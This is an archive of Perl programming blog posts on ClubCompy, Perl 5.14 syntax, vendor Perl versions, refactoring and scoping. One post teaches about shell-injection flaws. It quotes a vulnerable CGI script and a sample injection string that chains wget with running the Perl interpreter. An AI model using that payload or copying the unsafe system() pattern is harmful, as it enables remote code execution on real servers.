November 2010 Archives

Update: Dave explains ClubCompy and programs the ClubCompy shell on YouTube.

I've been working recently on ClubCompy, a service designed to introduce kids to computers and programming. The technology is interesting; it's HTML 5 and JavaScript and some other backend technologies. Dave and I have pushed the limits of our knowledge about software development, graphics programming, virtual machines, language design, parsing, education, game programming, publishing, and more.

It's been quite an experience, and we have much more work to do. We've launched a Kickstarter campaign to promote ClubCompy, and we would love for you to spread the news far and wide.

I've tried to approach the project from the point of view of our users rather than as a technologist. (I can and will write a lot more about the technologies, the design, and our future plans. I have a crazy story about a little Perl 5 program which works with the GIMP image program and custom palettes and generates 8-bit sprites suitable for embedding in little programs. As well, Parrot fans take note of this auspicious sentence.) Our vision—what's more important to Dave and me—is both respecting the history of computing from the early '80s and giving the next generation of computer users great opportunities to play, to discover, to explore, and to create new things. If you have a modern web browser, you can program an emulation of an 8-bit microcomputer with a full-blown programming language built in. How geeky is that?

I've relied on my personal history to shape this project. Nostalgia sprinkles fairy dust on all good memories, but even so, some sort of magic was in the air in the very early '80s. Maybe you remember too.

I was 6 or 7 the first time I used a computer. I remember it well. I walked into the special education classroom of Jackson Elementary school and saw it in the corner. Class hadn't begun yet, so I sat down, turned it on, and flipped to the first page of the manual.

A simple program stared back at me.

I hunted and pecked and managed to type out the whole program. It must have been five or six lines long. It didn't work; I'd typed it wrong. I sat and stared and realized my mistake.

The second time I typed the program, everything worked. I don't remember what the program did--probably greeted me and flashed the colors on the screen--but I was 6 or 7, and I'd told the first computer I'd ever touched what to do.

Our school district was fortunate. Computers started appearing in other classrooms. I could convince my parents to buy me a magazine with programs listed in it, then spend time after school or at lunch transcribing the programs and, as often as not, eventually making my way through a couple of pages of text and funny symbols to discover that, despite my typos, I could actually do something interesting.

I didn't notice then that all of this typing had sunk into my brain. I did notice that my typing had improved, but I didn't stop to think about what that meant, even the first afternoon I wrote out in longhand what I thought might somehow be a computer game where you move a mouse through a maze to find some cheese. I remember going to a friend's house to type it on his brother's computer. It didn't work, not completely, but more of it worked than should have worked.

I didn't think about that at all. I didn't worry that I could break a machine the school district or someone else's parents had spent a few hundred dollars to buy. I didn't have to ask permission to write a program (though teachers didn't want us playing games during school hours, of course, or getting in fights if more than one person wanted to play with the computer). I didn't even question the idea that when I sat down, I had to type instructions to make the computer do something. I took it for granted that it wanted me to write a program or give it a command.

Back in those days, when you turned on the computer, it sat there blinking at you, waiting for you to type something. That's it. If you were lucky, you had a tape drive or a floppy drive, and you could load a program, but otherwise all you had was what you'd created yourself.

What a time I had. When my parents could afford to buy our own, I hooked it up to the TV and wrote a little program that sent multicolored hot air balloons bouncing around the screen as a Father's Day card for my father. As a book report when I was 12 I wrote a little adventure program in which you could experience scenes from the book.

Yes, I played a lot of computer games. Yes, I spent a lot of money buying those magazines with type-in listings. Yes, I made a lot of amateurish mistakes and annoyed my parents by using the family TV when I could have been outside riding my bike or playing with the neighbor kids.

But I learned something. I learned that this lump of plastic and silicon and wires and who knows what else was more than a passive device. It was a tool. I could learn to use it. I could explore its secrets. I could build things with it, use my imagination to produce ideas which I could realize in part or in whole. I'm sure many of you have similar stories. Some of the details may differ, but something sparked your interest, and a series of small ah-ha moments guided your explorations.

We want to help as many kids as possible create those moments themselves.

When I showed ClubCompy to my seven-year-old nephew, he drew pictures with the turtle for a while, then looked up at me and said, "Uncle? What if there were a hundred turtles, and they could all draw? And what if you could make the turtle twice as fat as he is now? And what if he turns in a really really big circle, what would happen then?"

I told him that everything he mentioned was possible. After all, when you're seven and someone hands you a magical device that can do anything you imagine, you ought to dream big, really big dreams.

When Do You Report Semantics Errors?


I haven't commented on David Golden's work to allow references as the first operands to push and pop because I have mixed feelings about the feature. The simple explanation is that Perl 5.12 requires an explicit array as the first operand of both keywords:

push @some_array, $some_scalar;

my $other_scalar = pop @{ $some_array_reference };

With David's changes, you will also be able to write this code for Perl 5.14:

push $some_array_reference, $some_scalar;

my $other_scalar = pop $another_array_reference;

I like this change for a couple of reasons. First, it reduces the visual clutter of dereferencing. I've never cared for Perl 5's dereferencing syntax (it may be my least favorite syntactical part of the language), and David's right in that it's unnecessary in many cases here. Second, this change improves consistency in that all of these array manipulating functions obviously operate on containers, not the values of those containers. That is to say, pushing onto or shifting from an array modifies the contents of the array as a whole. It doesn't coerce those contents into a list and perform a transformation on the list. The consistency of writing, in effect, "It doesn't matter what kind of syntactic element represents an array—a bare array, a reference, or even something with tied array-like magic—as long as it behaves properly, that's the right thing to use here." appeals to me. (See also The Why of Perl Roles for an exploration of this design principle.)

Even so, I perceive a lessening of compile-time safety, even as I know that's probably an illusion.

If I write:

my @array = qw( some values here );
push @array, 'some other value';

... everything is fine. @array is obviously an array and is obviously correct. Yet if I write:

my @array = qw( some values here );
push @rray, 'some other value';

... then strict will catch the typo. @rray is obviously an array, but it's (probably) not present in the program at this point. So far so good. Yet if I write with 5.12:

my @array = qw( some values here );
push $array, 'some other value';

... that's obviously an error, because @array and $array are different variables. (The latter is most likely a typo, but that's just the peculiarly silly naming convention of this example, so don't count on it.)

With 5.14, I could also write:

my @array = qw( some values here );
push $hash_ref, 'some other value';

... and the error won't be visible until runtime, when push realizes its first operand isn't anything array-like at all. Of course, nothing prevents me from making a similar typo with Perl 5.12:

my @array = qw( some values here );
push @{ $hash_ref }, 'some other value';

... where the difference is a bit of extra (and, to my mind, somewhat ugly) syntax.

I know this isn't a peculiar disadvantage of the change, and I like the change overall, but it still seems to me to trade a little bit of compile-time safety for the potential for run-time errors. I'll use it and I'll get used to it and I'm certain I'll like it, especially with complex data structures. Perhaps it's my familiarity with explicit deferencing that gives the illusion of compile-time safety.
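The payoff with complex data structures can be sketched concretely. This hypothetical hash-of-arrays example compares the explicit dereference required through 5.12 with the reference-first form (shown commented out, so this runs on any Perl 5):

```perl
use strict;
use warnings;

# A hypothetical graph: node names mapped to hashes, each with an 'edges' array
my %graph = ( a => { edges => [] } );

# Perl 5.12 and earlier: explicit dereference, with its extra punctuation
push @{ $graph{a}{edges} }, 'a-b';

# Perl 5.14's proposed form, with the dereferencing clutter gone:
# push $graph{a}{edges}, 'a-c';

print scalar @{ $graph{a}{edges} }, "\n";   # prints 1
```

The nested subscripts make the @{ ... } wrapper all the noisier, which is exactly the case where the new form earns its keep.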

(You can use Vincent Pit's autovivification pragma to avoid some of the potential damage of mistakes with explicit or implicit dereferencing, but again that's not a compile-time fix. I suspect what I really want here is Perl 6's gradual typing system.)

Unnecessary and Insecure Interpolation

A couple of days after writing the Petty Tyranny of Good Habits, I stumbled across an example. I still don't quite understand what the Pinata Buster code does, but I found a security hole two seconds into reading the code. (I notified them and they updated their program quickly, so I'm avoiding the full disclosure debate debacle.)

The original code looked something like:

#!/usr/bin/perl -w

my @values = split(/&/,$ENV{'QUERY_STRING'});
foreach my $i (@values) {
    ($varname, $mydata) = split(/=/,$i);
}

system( "echo '$mydata' >> /home/rhett/usernick" );
system('/home/rhett/music_player.rb &');
system('/home/rhett/servos/phidgets-examples/AdvancedServo-simple &');

The first system call, which interpolates $mydata into a shell command, shows the problem. (Yes, splitting the query string on & is horribly buggy on its own, but that's not a security flaw in and of itself.)

This isn't quite a Bobby Tables moment, in that the potential for mischief extends to anything accessible to the user account under which this program runs, and not just a SQL database.

(If you don't see the security problem, think about what would happen if someone invoked this program with the URL '; wget && $^X; echo "all is fine", properly URL-encoded of course.)

This is the same type of problem which makes this code:

open my $fh, "$some_file_name" or die "Security breach didn't work: $!";

... much less secure than the modern version:

open my $fh, '<', $some_file_name or die "Cannot read from input file: $!";

This is not a problem you can (entirely) alleviate by vetting the content of the string; it's difficult to craft a regex or a series of transformations to remove every possible combination of characters which may cause unintended behavior. You should continue to vet the sanity of the contents of these strings to help with security and safety, but the most reliable way to avoid unintentional interpolation problems with untrusted user input is to avoid interpolation altogether, whether with the three-arg form of open or with the list form of system.
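A minimal sketch of those safer forms, using a temporary file rather than the program's real paths; the hostile $mydata string here is a made-up example:

```perl
use strict;
use warnings;
use File::Temp qw( tempfile );

# Hostile input: inert, because it never reaches a shell
my $mydata = q{'; echo pwned; '};

# Three-arg open: the filename argument is only ever a filename
my ( $fh, $filename ) = tempfile();
print {$fh} "$mydata\n";
close $fh or die "Cannot close $filename: $!";

# List form of system: arguments go straight to the program, no shell involved
system( 'ls', $filename ) == 0
    or die "ls failed: $?";
```

Because no shell ever parses $mydata, the embedded quotes and semicolons are just bytes in a file, not commands.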

Note that even though the example program has replaced the offending system call with direct file access using two-arg open, it no longer interpolates untrusted user input in an unsafe fashion. It's still clunky code, but it's safer.

Again, the unsafe forms of open and system are merely warning signs. (This pattern of program isn't inherently bad. I have a very useful shell script written in Perl 5 which uses a similar pattern of string manipulation and system calls because string manipulation in bash is painful.) The problem is interpolation of untrusted user input in places where untrusted characters may produce unintended behavior.

Then again, the safe forms of open and system exist to avoid that problem altogether.

The Petty Tyranny of Good Habits


The most useful general purpose tool I've ever owned is a Leatherman. It has pliers, a knife, wire cutters, two screwdriver heads, a bottle opener, a file, and a punch tool. It's great to keep at arm's reach for those occasions when I need one of those tools for a moment. It's quick and easy, even if it's not always the rightest tool.

If I wanted to make coleslaw, I could cut cabbage with it (but cutting cabbage is easier with a mandolin slicer).

If I wanted to tighten the handle of a drawer, I could use one of the screwdriver blades (though a dedicated screwdriver of the appropriate size offers more leverage).

If I had to open a paint can, I could use one of the other small blades (though that takes more work than using a real pryer).

I'm sure I could even break through rotten sheet rock with the tool if I didn't have a sledgehammer handy.

Go to a restaurant and you won't see the prep chefs shredding cabbage with a Leatherman. Go to a cabinetry shop and you won't see carpenters driving screws with a Leatherman. Go to a paint shop and you won't see the mixers opening cans with a Leatherman. It's a great tool for quick and dirty things, but it doesn't scale to professional uses.

If only programmers could exhibit the same degree of professionalism.

Consider the debate over Ugly Old Perl:

  • "Why should I change working code?"
  • "Isn't there more than one way to do it? Stop being so rigid!"
  • "The old way works just fine!"
  • "This has never failed for me before."
  • "You're just a follower of fashion!"
  • "You're a petty tyrant who loves to tell other people what to do."

Here's the thing. If all you have is a Leatherman and you have a really quick job you can get done in ten seconds, that's one thing. (It still helps if you know what you're doing; opening a paint can with the knife is a great way to break the tool and lose a lot of blood.) If you need to do something else, bad habits don't scale.

If you're writing a tiny program that no one but the five-minutes-in-the-future-you will ever have to read and you know all of the characteristics of user input and output and the security considerations, go ahead and use global variables. Go ahead and leave your code unfactored. Go ahead and ignore the error codes of system calls. If the sole determinant of how well you've programmed is how quickly you can get from having no program to having a program and no one ever, ever, ever needs to maintain it, make as much of a mess as you want.

With that said, I know very few programs which don't need to scale for maintainability. Sure, that function you've written just now gets away with clobbering a global filehandle without any ill effect you can detect, but can you guarantee it will continue to do so while other people write other code in other parts of the program? Can you guarantee that all code called from that function will respect the global filehandle you've created?

Good habits, such as lexical encapsulation, checking error codes, and avoiding unnecessary interpolation of variables you are (at least for now) confident are completely safe, help you enforce those guarantees and keep confidence in a system as it grows and changes under the hands of other people (including future you).

That's why it's important to teach novices the safest way to program first, and then show them how to manage working with quick and dirty code. Set their habits appropriately so that their code will help, not hinder, their ability to write correct and maintainable code.

The Book is Out!


After countless commits, the generosity of dozens of proofreaders, and far too long proofreading the index, Modern Perl: the book is available!

You can buy a lovely print version from any well-stocked online vendor (and you're more than welcome to walk into your favorite neighborhood bookstore and request a special order given the book's ISBN: anyone who can order from Ingram can get the book in stock.) The ISBN-10 is 0-9779201-5-1 and the ISBN-13 is 978-0-9779201-5-0. Either should work.

If you prefer an electronic version, my publisher has agreed to make available both letter- and A4-sized versions of the book suitable for printing or browsing on your favorite device. We're also working on an ePub version. (Getting clickable intertextual links working in ePub was trickier than in PDF, so go figure—but isn't it nice to have clickable links in an index?)

These are free of cost and free of DRM, but not free of obligation. Your duty is to share the book with everyone who needs it. Give away the PDFs (and the ePub) far and wide. Write reviews. Cite it on the beginners mailing list. Seed it on BitTorrent. Host it on your own site.

We ask (but do not require) that if you find the book useful, you consider donating a fair value to help us produce more books of this type.

Ultimately we produced this book because we believe that the world needs more great books about technology, especially modern Perl 5. Please help prove us right.

The brand-new RHEL 6 includes a modernish version of Perl 5, only three stable releases obsolete. (Perl 5.10.1 is almost 15 months old, and it's also the oldest version of Perl 5 I consider using on any current project.) That's the good news.

The bad news is that RHEL 6 will stick around for several years, just as RHEL 5 did. RHEL 5 uses Perl 5.8.8 (almost 5 years old and six stable releases obsolete). RHEL 4 is also still around. It uses Perl 5.8.5 (almost six and a half years old and nine stable releases obsolete).

By the time RHEL 6 retires in late 2015 or 2016, the current stable release of Perl 5 will be 5.20.2 or 5.20.3. Assuming two minor stable releases of each major version, RHEL 6's Perl 5 will be fourteen stable releases out of date.

Bluntly, RHEL sells you the belief that you can build on the foundation of the software they provide and not worry about the pesky details of who actually wrote the software and how they develop it. For the hundreds or thousands of dollars enterprise customers pay Red Hat to support obsolete software such as Perl 5, Red Hat employs (to my knowledge) no core Perl 5 developers. That is to say, your support dollars don't actually go to anyone with the knowledge or authority to patch Perl 5 to meet your needs, especially after the core developers have explicitly disclaimed responsibility or desire to support ancient releases.

(I don't mean to pick on Red Hat alone here; the latest Solaris release, Solaris 10, includes Perl 5.8.4, six and a half years old and nine stable releases obsolete.)

How can anyone characterize the reliance on a vendor Perl 5 from an Enterprise Distribution as anything other than irresponsible and risky? At some point, maybe it's worth gently nudging these vendors to rename the creaky old software in their default installs to indicate its obsolescence and lack of support from the actual developers of Perl 5. The word encystation has its charms, though I suppose nacre is easier to spell.

For everyone else, free yourself from the tyranny of obsolescence foisted upon you by the Enterprise World and install a modern release of Perl 5 with App::perlbrew.

Compile-Time Pollution Checking


I fixed a bug in some under-tested code yesterday while writing unit tests.

package Some::Module;

use Modern::Perl;
use Moose;

# Moose attributes here

sub some_useful_method {
    my ($self, $value) = @_;

    my $scrubbed_value = Some::Helper::some_function( $value );
    $self->set_value( $scrubbed_value );
}

The details aren't interesting, but this is the minimal example necessary to show the problem. If you don't immediately see it, here's an alternate version of the method which would have made the error obvious:

sub some_useful_method {
    my ($self, $value) = @_;

    my $scrubbed_value = some_function( $value );
    $self->set_value( $scrubbed_value );
}

In this case, the desire not to pollute the current namespace with auxiliary functions defined elsewhere was the culprit. The solution was to add a single use Some::Helper; to the file.

Unfortunately, there was no way to catch this without writing a test which exercised the code path which triggered this call. The discipline of comprehensive testing would have caught it, as would the practice of importing functions from other packages explicitly. Couple that with namespace::autoclean to alleviate namespace pollution (thanks, Python!) and the damage is minimal, as long as everyone working on this code demonstrated sufficient discipline.
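The failure mode is easy to reproduce. This self-contained sketch uses made-up package names to show that the unqualified call parses cleanly under strict and only dies when that line of code actually runs:

```perl
use strict;
use warnings;

package Some::Module;

sub some_useful_method {
    my $value = shift;

    # Compiles without complaint under strict; fails only at runtime
    return some_function( $value );
}

package main;

my $result = eval { Some::Module::some_useful_method('x') };
print $@ =~ /Undefined subroutine/ ? "caught at runtime\n" : "no error\n";
```

Nothing short of executing this code path reveals the missing definition, which is the whole argument for comprehensive test coverage here.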

Then again, I can imagine a Perl 5 pragma which attempts to resolve all such symbols, qualified and not, at the end of compile-time and aborts the program otherwise. (Yes, there are AUTOLOAD concerns, but those are tractable.)

Sometimes a little more static typing up front can be useful.

I do a lot of exploratory programming. I prefer it, even. It's much more satisfying (and effective) to sketch out a simple design for the few most important features of a project, implement those, then analyze the whole thing in light of what I need to write next.

Often the experience of solving a problem that way helps me to understand what I did right and what I did wrong. What was difficult to write? What was difficult to test? What will I have to change to account for new features?

Refactoring, in my mind, is a disciplined process of rearranging source code to improve its maintainability, its correctness, and its testability. It's satisfying to extract a third entity (a class or a role) from two other entities. It's very satisfying to collapse several duplicate or near-duplicate pieces of code into a single line. It's powerful to delete code and fix bugs and add features.

One of the main benefits I've achieved from learning Haskell is the profound understanding that a function composed of two or three lines of pure code is easy to test and easy to reuse. The same goes for Smalltalk, where a method of two or three lines may not be pure, but it's very powerful and often very reusable.

In Perl 5, this refactoring usually follows several stages: from procedural code to objects to roles to very small methods. In that final stage, a handful of design constraints govern how I approach my refactorings:

  • Can I name the extracted method appropriately?
  • Does it have a single obvious return value?
  • Does it need more than two or three parameters? (A list of items over which to iterate counts as a single parameter.)
  • If I were to use mocking to test the method, how many passes do I need to make through it to get full coverage? How much external data do I need to set up and tear down to test it appropriately?

(Similar questions apply to refactoring C code, but C's relative lack of abstractions compared to Perl 5—let alone modern Perl 5 with Moose—makes that work more difficult. You can circumnavigate a sea of function pointers stored in structs and callbacks and dummy parameters you need sometimes and don't other times and those lovely casts to void *, but at some point it's nice to join the state of the art circa 1985 at least.)

The result tends to be methods of five or six lines in length (not counting BSD-style braces and copious vertical whitespace). Now imagine if core Perl let me write:

method find_comments
{
    my $content = $self->content();

    return $1 if $content =~ /(\d+)\s+comments/i
              || $content =~ /comments:?\s+(\d+)/i;

    return 0;
}
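For contrast, here is the same method in today's core Perl 5, wrapped in a hypothetical PageCounter class so it runs standalone; the content() accessor is an assumption for the sake of the example:

```perl
use strict;
use warnings;

package PageCounter;   # hypothetical class with a content() accessor

sub new     { my ($class, $text) = @_; return bless { content => $text }, $class }
sub content { return $_[0]{content} }

sub find_comments {
    my $self    = shift;
    my $content = $self->content();

    return $1 if $content =~ /(\d+)\s+comments/i
              || $content =~ /comments:?\s+(\d+)/i;

    return 0;
}

package main;
print PageCounter->new('12 comments so far')->find_comments(), "\n";   # prints 12
```

The sub keyword and the manual my $self = shift; line are exactly the overhead the imagined method syntax would eliminate.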

Saving a line or two on every one of these small methods is suddenly significant. Perhaps a philosophical (some might say sardonic) way to describe refactoring is "the systemic process of discovering the limitations of expressiveness and abstraction of your current programming language."

Perl 5's flexibility allows the CPAN to exist and CPAN's flexibility allows Perl 5 to evolve. Where would Perl be without the DBI or TAP? Imagine using Perl 5 without LWP or Moose or Perl::Critic.

Even so, the difference between a core language feature and a language extension created and maintained and distributed outside of the core is immense. Certainly some code uses non-DBI database modules, but it's clear that DBI is the foundation of all modern and widespread database use in Perl 5 today. Similarly, try using a test module without Test::Builder. Moose hasn't quite taken over the CPAN yet, but it's a matter of time.

In other words, some language extensions become so prevalent that they might as well be core parts of the language. (I realize not everyone uses the boilerplate of strict and warnings and autodie and feature in every Perl 5 file they write, but enough do that writing the silly little Modern::Perl was a worthwhile abstraction and encapsulation. One of my current projects has 41 Perl 5 files at the moment and some 1866 lines of code. 4.2% of my SLOC count would be that boilerplate if it weren't for this pragma. Boilerplate adds up.)

Unlike core language features, language extensions have no strong single authority to ensure that they interact appropriately. (There's always the post hoc bug report, with its finger pointing and blame and the end result of a Pragmatic if Horrifyingly unPlanned programming language.) Language designers can only do so much to encourage the developers of extensions to consider how to work well with each other.

If I'm right about the history and motives of the development of Perl 5, the fundamental unit of encapsulation in modern Perl is lexical scoping. If that's correct, the boundaries between various components of a Perl program must have their hard edges at lexical scopes.

In specific, the warnings pragma is friendlier than the -w command-line argument to Perl 5 because it does not enforce global behavior for code outside of its lexical scope.
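That lexical scoping is easy to demonstrate. In this sketch, the same interpolation of an undefined value is silent inside the block where the pragma applies and warns outside it:

```perl
use strict;
use warnings;

my @warnings;
local $SIG{__WARN__} = sub { push @warnings, $_[0] };

{
    no warnings 'uninitialized';
    my $x;
    my $y = "value: $x";    # silent inside this lexical scope
}

my $z;
my $w = "value: $z";        # warns out here, where the pragma never applied

print scalar @warnings, "\n";   # prints 1
```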

In specific, using global variables is dangerous because it ignores encapsulation boundaries. (Yes, the existence of so many magic superglobals in Perl 5 itself is a language flaw.)

In specific, using UNIVERSAL::isa() to check the class of a referent is an unneighborly design error because it does not allow the referent to control its own nature.
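A sketch of why: a hypothetical Proxy class that overrides isa() to claim it stands in for another class answers correctly through the method call, but UNIVERSAL::isa() as a function ignores the override entirely:

```perl
use strict;
use warnings;

package Proxy;   # hypothetical proxy claiming to be the class it wraps

sub new { return bless {}, shift }
sub isa { my ($self, $class) = @_; return $class eq 'RealThing' ? 1 : 0 }

package main;

my $obj = Proxy->new();

print $obj->isa('RealThing')            ? "method: yes\n" : "method: no\n";
print UNIVERSAL::isa($obj, 'RealThing') ? "direct: yes\n" : "direct: no\n";
```

The method call prints "method: yes" and the function call prints "direct: no": only the former lets the referent control its own nature.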

In specific, using direct dereferencing access for object attributes is a mistake because it bypasses any validation or indirection which you shouldn't even know exists in a well-designed system.

None of these should be surprises to experienced Perl 5 programmers, but the implications run deeper—especially when discussing CPAN distributions.

With the caveat that a pragma (autovivification or autodie) with well-defined semantics (and adherence to lexical scoping) is acceptable precisely for its side effects (which do not leak out), a well-behaved CPAN distribution both sets a strict lexical boundary around its encapsulation and does not interfere with other code by its existence.

Moose is yet again a good example: it does not subvert Perl 5's default OO and it interacts with Perl 5's default OO. (In truth, the main legitimate gripe about the effect Moose has on programs is its effect on program startup time.)

You can see the flip side of this principle in other languages which encourage monkeypatching of core language features without regard for lexical scoping of changes. This has the potential to devolve into a squatter's rights free-for-all, with the battle to be the first, most widely used library to scribble all over core behavior with little regard for the needs of anyone else. You might think that in these cases core always wins, but by not defining a mechanism for these types of extensions to work correctly, core can't win.

Then again, you have to get scoping right before any of this has a chance of working correctly.

Extensibility and Composability

Everyone always says that CPAN is Perl 5's killer feature, and that's true to an extent. Certainly the ability for me, an experienced Perl 5 programmer and CPAN contributor, to discover a need in my code, search CPAN for it, and install the right module within a minute is a powerful reason to write new code in Perl 5.

Certainly the language design of Perl 5 which made CPAN possible is a powerful example to emulate in Perl 6 and other languages.

Certainly the weight of contributions and the ease of publishing new distributions has created a critical mass which encourages new development on the CPAN as well as continued maintenance of existing projects. A loose collection of community standards and a design process which undertakes the barest minimum necessary to index and mirror tens of thousands of modules helps.


Large portions of the CPAN (see also perl5i and why it matters) exist to make up for shortcomings of Perl 5's initial design. This is a normal, natural process. A language designed to solve problems unidentified at the design stage—problems which do not even exist during the design period—will make mistakes, and a language which includes safety valves for this sort of expansion has a stronger ecological potential than one which does not. (Imagine a 4GL which could only output uppercase letters, digits, and a few punctuation symbols to a 3270 terminal. How long will those programs last? (Don't answer that; more screen scraping exists than you would believe.))

No one had the CGI protocol (or FastCGI or WSGI) in mind when redesigning Perl from Perl 4 to Perl 5, and yet Perl 5 (and even Perl 4, if you have an RHEL or Solaris contract) worked very well with that protocol. Now we have Catalyst and Dancer and countless other systems, framework and not, built around a very simple line-oriented control protocol to send documents across the network.

In other words, I want to praise and inspire Perl and the CPAN, not to bury it.

Yet inspiring and improving Perl means assessing its strengths and weaknesses honestly and accurately. One of those weaknesses reveals structural flaws in Perl 5 and exhibits itself in one dramatic fashion through the CPAN: composability of language and abstraction.

I'll explore that idea in specific in the next installments.
